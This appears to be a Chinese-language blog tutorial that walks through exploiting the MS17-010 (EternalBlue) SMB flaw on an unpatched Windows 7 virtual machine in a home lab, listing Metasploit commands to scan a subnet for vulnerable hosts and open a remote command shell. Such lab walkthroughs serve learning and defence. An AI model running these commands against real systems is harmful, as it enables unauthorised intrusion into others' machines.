2017 年橫卷網絡的勒索軟件,就是利用了 Windows7 的SMB漏洞,進行傳播.
惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。
以上所說,只是為了提高一下這個 MS17-010 的知名度.
現在利用msfconsole 進行滲透已經是輕車熟路,老生常談. 但如果你的電腦還沒打補丁,還是打上為好,畢竟安全第一.
環境搭建
使用 virtualbox 或者 VMware workstation 分別安裝 Kali Linux 和 Windows7 sp1 (原版是沒補丁的),橋接網絡,便於通信.
筆者的環境是 virtualbox , black arch 和 Windows7 . Windows7得開一下共享,默認是開放445端口的.
blackarch : 192.168.2.106
Windows7 : 192.168.2.107
掃描系統
啟動系統
blackarch 默認登錄用戶名 root , 密碼 blackarch .
Windows7 開啟共享,這樣才會開放445端口.
在 blackarch 中 輸入 msfconsole 啟動.
掃描漏洞主機
msf5> search ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
可以看到, RHOST 是必須設置的, THREADS 也是必須設置,但是有默認值1了.
msf5 auxiliary(scanner/smb/smb_ms17_010) >set rhosts 192.168.2.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) >set threads 12
msf5 auxiliary(scanner/smb/smb_ms17_010) >run
此處 rhosts 是掃面整個網段, 如果知道目標主機IP 可以使用 IP 直接代替. 例如筆者的是 192.168.2.107.
設置 threads 線程數,可以影響掃描速度. 掃描結果如圖:
出現紅色描畫部分,就說明該主機可能存在漏洞.
滲透攻擊
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
可以看到, rhosts 是必須設置的,且默認為空.
msf5 exploit(windows/smb/ms17_010_eternalblue) >set rhosts 192.168.2.107
msf5 exploit(windows/smb/ms17_010_eternalblue) >run
當出現 "command shell session 1 opened" 出現,已經說明滲透成功了.
如果此時還沒出現 session ,直接輸入 job + 回車 ,即可進入shell.
補充
- 默認安裝的Windows7是關閉smb共享的,此時是無法滲透成功的.
- 目標主機是Windows7 簡體中文版,所以終端會話是亂碼狀態,修改一下終端的編碼為 GBK 編碼即可.
關鍵字: scanner Windows7 auxiliary